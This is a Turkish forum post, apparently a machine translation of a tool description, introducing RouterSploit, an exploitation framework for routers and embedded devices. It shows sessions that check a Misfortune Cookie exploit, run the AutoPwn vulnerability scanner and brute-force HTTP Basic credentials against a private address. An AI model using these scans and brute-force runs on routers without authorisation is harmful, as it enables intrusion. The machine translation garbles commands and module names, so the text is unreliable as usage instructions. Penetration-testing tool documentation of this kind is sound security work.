Hoşgeldin Misafir

RouterSploit

SurHan

28 Kas 2017
4,186 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
routersploit Paket Açıklaması-


RouterSploit Framework, gömülü aygıtlara ayrılmış açık kaynaklı bir sömürü çerçevesidir. Penetrasyon test işlemlerine yardımcı olan çeşitli modüller içerir:-
  • exploits - tanımlanmış güvenlik açıklarından yararlanan modüller
  • krediler - ağ hizmetlerine karşı kimlik bilgilerini test etmek için tasarlanmış modüller
  • tarayıcılar - bir hedefin herhangi bir açıklığa karşı savunmasız olup olmadığını kontrol eden modüller
----------------------------------------------------------------------------------------------------------------------------------------------------------

Routersploit paketinde bulunan araçlar-

routersploit - RouterSploit Framework-




Kod:
root @ kali: ~ # routersploit 
 ______ _ _____ _ _ _ 
 | ___ \ | | / ___ | | | (_) | 
 | | _ / / ___ _ _ | | _ ___ _ __ \ `-. _ __ | | ___ _ | | _ 
 | // _ \ | | | | __ / _ \ '__ | `-. \ '_ \ | | / _ \ | | __ | 
 | | \ \ (_) | | _ | | || __ / | / \ __ / / | _) | | (_) | | | _ 
 \ _ | \ _ \ ___ / \ __, _ | \ __ \ ___ | _ | \ ____ / | .__ / | _ | \ ___ / | _ | \ __ | 
                                     | | 
     Yönlendirici Sömürü Çerçeve | _ | 

 Dev Team: Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz) 
 Codename: Kötü Kan 
 Sürüm: 2.0.0 

 Toplam modül sayısı: 40 

rsf>

RouterSploit Kullanım Örnekleri-

RouterSploit'in farklı yönlendirici modelleri için çeşitli yararları vardır ve bir istismar göndermeden önce uzak hedefin savunmasız olup olmadığını kontrol etme yeteneği vardır.-



Kod:
rsf> exploits / multi / misfortune_cookie 
rsf (Misfortune Cookie) kullan> seçenekleri göster 

Hedef seçenekler: 

   Ad Geçerli ayarlar Açıklama 
   ---- ---------------- ------- ---- 
   port 80 Hedef port 
   hedefi Hedef adres örn. http://192.168.1.1 


rsf (Talihsiz Kurabiye)> hedef belirle 192.168.0.2 
[+] {'hedef': '192.168.0.2'} 
rsf (Talihsiz Kurabiye)> kontrol 
[-] Hedef savunmasız 
rsf değil (Misfortune Cookie)>

Gizlilik bir gereklilik değilse, herhangi bir güvenlik açığının bulunup bulunamayacağını görmek için otomatik tarayıcı modülünü kullanmayı deneyebilirsiniz .-



Kod:
rsf> tarayıcıları kullan / autopwn 
rsf (AutoPwn)> show options 

Hedef seçenekler: 

   İsim Geçerli ayarlar Açıklama 
   ---- ---------------- ---------- - 
   port 80 Hedef port 
   hedefi Hedef IP adresi, örn. 192.168.1.1 


rsf (AutoPwn)> hedef belirle 192.168.0.2 
[+] {'target': '192.168.0.2'} 
rsf (AutoPwn)> çalıştır 
[*] Çalışma modülü .. . 
[-] patlatır / Fortinet / fortigate_os_backdoor açık değildir 
[-] patlatır / Belkin / n150_path_traversal açık değildir 
[-] patlatır / Belkin / g_n150_password_disclosure açık değildir 
[-] patlatır / Belkin / n750_rce kırılgan değildir
[-] patlatır / Belkin / g_plus_info_disclosure açık değildir 
[-] patlatır / asus / infosvr_backdoor_rce açık değildir 
[-] patlatır / asus / rt_n16_password_disclosure açık değildir 
[-] patlatır / 2wire / gateway_auth_bypass açık değildir 
[-] patlatır / teknikolor / tc7200_password_disclosure kırılgan değildir 
patlatır / çocuklar / multi_rce açık değildir [-] 
[-] patlatır / çocuklar / n300_auth_bypass kırılgan değildir 
patlatır / çocuklar / prosafe_rce açık değildir [-] 
[-] patlatır / asmax / ar_1004g_password_disclosure açık değildir 
[ -] exploits / asmax / ar_804_gu_rce savunmasız değildir 
[-] exploits / linksys / wap54gv3_rce savunmasız değildir 
[-] exploits / linksys / 1500_2500_rce savunmasız değildir
[-] exploits / multi / misfortune_cookie savunmasız değildir 
[-] exploits / cisco / ucs_manager_rce savunmasız değildir 
[-] exploits / dlink / dsl_2750b_info_disclosure savunmasız değildir 
[-] exploits / dlink / dir_645_password_disclosure savunmasız değildir 
[-] exploits / dlink / dir_300_600_615_info_disclosure savunmasız değildir 
[-] exploits / dlink / dir_300_320_615_auth_bypass savunmasız değildir 
[-] exploits / dlink / dwr_932_info_disclosure savunmasız değildir 
[-] exploits / dlink / dns_320l_327l_rce savunmasız değildir 
[-] exploits / dlink / dvg_n5402sp_path_traversal savunmasız değildir 
[ -] exploits / dlink / dir_300_600_rce savunmasız değildir 
[-] exploits / juniper / screenos_backdoor savunmasız değildir
[-] exploits / comtrend / ct_5361t_password_disclosure savunmasız değildir 
[-] Cihaz herhangi bir saldırıya karşı savunmasız değildir! 

rsf (Otomatik Çekme)>
[*]
Bütün bunlardan başarısız olursa, RouterSploit bir numarası vardır creds HTTP, SSH ve Telnet gibi çeşitli hizmetler, kaba kuvvet modüller.-


Kod:
rsf> kullan c 
kredileri / http_basic_bruteforce rsf (HTTP Temel Bruteforce)> gösterme seçenekleri 

Hedef seçenekler: 

   Ad Geçerli ayarlar Açıklama                                               
   ---- ---------------- -------- ---                                               
   port 80 Hedef port                                               
   hedefi Hedef IP adresi veya hedefli dosya: port (dosya: //)     


Modül seçenekleri: 

   İsim Geçerli ayarlar Açıklama                                   
   ---- ---------------- -----------                                   
   yolu / URL Yolu                                       
   yönetici Adı adlarına veya kullanıcı adları (file: //) dosyasını     
   şifreleri dosya : ///usr/share/routersploit/routersploit/wordlists/passwords.txt Parola veya parolalı dosya (dosya: //)    
   thread 8 Konu sayısı                            



verbosity    yes Ekran kimlik doğrulaması girişimi               rsf (HTTP Temel Bruteforce)> hedef belirle 192.168.0.2 
[+] {'hedef': '192.168.0.2'} 
rsf (HTTP Temel Bruteforce)> set parola dosyası: /// usr / share / wordlists /nmap.lst 
[+] {'şifreler': 'dosya: ///usr/share/wordlists/nmap.lst'} 
rsf (HTTP Temel Bruteforce)> ayrıntı ayarlanamaz 
[+] {'ayrıntı': 'hayır' } 
rsf (HTTP Temel Bruteforce)> çalıştırın 
[*] Çalışan modül ... 
[*] Geçen süre: 1.97385120392 saniye 
[+] Kimlik bilgileri bulundu! 

   Hedef Liman Giriş Şifresi     
   ------ ---- ----- --------     
   192.168.0.2 80 yönetici şifresi     

rsf (HTTP Temel Bruteforce)>